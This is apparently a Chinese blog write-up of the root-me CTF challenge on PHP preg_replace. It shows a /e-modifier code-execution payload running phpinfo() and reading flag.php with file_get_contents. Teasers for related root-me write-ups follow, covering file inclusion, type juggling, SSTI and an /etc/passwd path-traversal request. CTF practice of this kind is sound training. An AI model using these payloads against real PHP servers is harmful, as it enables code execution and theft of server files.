【root-me CTF練習】Web伺服器安全-PHP preg_replace
靶機地址
解題思路
此題考的是利用PHP 的preg_replace函式導致的程式碼執行。
/e 修正符使 preg_replace() 將 replacement 引數當作 PHP 程式碼。PHP 5.5.0 起, 傳入 “\e” 修飾符的時候,會產生一個 E_DEPRECATED 錯誤; PHP 7.0.0 起,會產生 E_WARNING 錯誤,同時 “\e” 也無法起效。
測試
<?php
echo preg_replace ('/test/e', 'phpinfo()', 'just test');
?>
這裡是php5.4版本,成功執行。
那麼接下來就好做了,利用file_get_contents()函式讀取flag.php檔案即可
<?php
echo preg_replace('/test/e',"file_get_contents('flag.php')",'just test');
?>
相關推薦
【root-me CTF練習】Web伺服器安全-PHP preg_replace
靶機地址 http://challenge01.root-me.org/web-serveur/ch37/index.php 解題思路 此題考的是利用PHP 的preg_replace函式導致的程式碼執行。 /e 修正符使 preg_replace()
【root-me CTF練習】Web伺服器安全-PHP 遠端檔案包含
靶機地址 http://challenge01.root-me.org/web-serveur/ch13/ 解題思路 根據題目,得知考的應該是include()函式遠端包含檔案,那麼則需要php.ini的配置選項allow_url_fopen和allow_u
【root-me CTF練習】Web伺服器安全-PHP type juggling
靶機地址 http://challenge01.root-me.org/web-serveur/ch44/ 解題思路 檢視提示的原始碼,發現主要是需要繞過以下比較: if($auth['data']['login'] == $USER &&
【root-me CTF練習】Web伺服器安全-PHP -寬鬆的比較
靶機地址 http://challenge01.root-me.org/web-serveur/ch55/ 解題思路 檢視提示的原始碼,發現需要滿足 $s != false && $h != false if($s.$r == $h) 也就
【root-me CTF練習】Web伺服器安全-SSTI攻擊(模板注入)
靶機地址 http://challenge01.root-me.org/web-serveur/ch41/ 模板引擎 模板的誕生是為了將顯示與資料分離,模板技術多種多樣,但其本質是將模板檔案和資料通過模板引擎生成最終的HTML程式碼。服務端模板注入和常見We
【root-me CTF練習】Web伺服器安全-本地檔案包含-雙重編碼
靶機地址 http://challenge01.root-me.org/web-serveur/ch45/ 解題思路 通過構造測試連結發現,這關也是通過include函式包含的,並且檔名自動加上.inc.php,而這個版本的php是無法使用%00也就是null位元組
【root-me CTF練習】Web伺服器安全-本地檔案包含
靶機地址 http://challenge01.root-me.org/web-serveur/ch16/ 解題思路 通過點選網站上的不同板塊,可以看到可根據不同目錄讀取相應的檔案內容,如以下連結讀取sysadm目錄裡的index.html檔案內容。 http://
【root-me CTF練習】Web伺服器安全-第二十一關- PHP register globals
解題思路: 本題考的是PHP變數覆蓋漏洞。那麼首先來了解下PHP的變數覆蓋。 變數覆蓋: 變數覆蓋指的是用我們自定義的引數值去替換程式原有的變數值,一般變數覆蓋漏洞需要結合程式的其它功能來實現完整的攻擊。經常導致變數覆蓋漏洞場景有:$$,extract()函式,pa
【ASP.NET】——WEB伺服器控制元件
WEB伺服器控制元件分類: 內部控制元件 列表控制元件 複雜控制元件 驗證控制元件 內部控制元件 ASP.NET引入一組稱為“內部控制元件”的新控制元件,專門用於ASP.NET 內部控制元件的使用方法與HTML控制元件相同,他們對映到HTML元素並通過
【滲透測試學習平臺】 web for pentester -3.目錄遍歷
線上 ini blog etc col tdi jos turn bsp Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example
【獻給CWNU的師弟】Web篇
web con size div data- trac align mark font 2014年10月8日 獻給CWNU的師弟 【獻給CWNU的師弟】Web篇
慕課筆記利用css進行布局【混合布局練習】
進行 oat html eight add type round 一個 內容 通過學習div的布局,以一個簡單的內容管理網站的布局為例子,用div+css進行簡單的網頁布局,加深學印象: <html> <head> <title>
【HITB GSEC CTF 2017】1000levels
image 運算 位置 步驟 pri 循環 imp 隨機化 .html https://files.cnblogs.com/files/p4nda/498a3f10-8976-4733-8bdb-30d6f9d9fdad.gz #通過閱讀天樞戰隊大佬們的wp調試的結
【Java知識點專項練習】之 Java魯棒性的特點
響應 計算 指針 情況 功能 異常處理 可能 java編譯 檢查 Java魯棒性的特點如下: Java在編譯和運行程序時都要對可能出現的問題進行檢查,以防止錯誤的產生。 Java編譯器可以查出許多其他語言運行時才能發現的錯誤。 Java不支持指針操作,大大減少了錯誤發
【Java知識點專項練習】之 數據類型兩大類
char ger ava 練習 類型 包裝類 java 進行 cte Java的數據類型分為兩大類:基本類型和引用類型; 基本類型只能保存一些常量數據,引用類型除了可以保存數據,還能提供操作這些數據的功能; 為了操作基本類型的數據,java也對它們進行了封裝, 得到八個類,
【Python3 爬蟲學習筆記】Web庫的安裝
我們主要使用Flask、Django等Web服務程式來搭建一些API介面,供我們的爬蟲使用。例如維護一個代理池,代理儲存在Redis資料庫中,我們要將代理池作為一個公共的元件使用,那麼如何構建一個方便的平臺來供我們獲取這些代理呢?最適合不過就是通過Web服務提供
【資料結構 JavaScript版】- web前端開發精品課程【紅點工場】 --javascript--進位制轉換
<!DOCTYPE html> <html> <head> <title></title> </head> <body> <script> //【資料結構 JavaScript版】- web前端開發精品課
【資料結構 JavaScript版】- web前端開發精品課程【紅點工場】 --javascript-- 迴圈佇列
<!DOCTYPE html> <html> <head> <title></title> </head> <body> <script> //【資料結構 JavaScript版】- web前
【資料結構 JavaScript版】- web前端開發精品課程【紅點工場】 --javascript-- 佇列概念
<!DOCTYPE html> <html> <head> <title></title> </head> <body> <script> //【資料結構 JavaScript版】- web前端開發精品課
CTF-練習平臺 Web writeup
簽到題web2檔案上傳測試經典的題目,用burp抓包得到如下 然後我們更改一下上傳路徑然後用%00截斷一下即可Content-Disposition: form-data; name="file"; filename="3.png%001.php"1計算題改一下瀏覽器中的te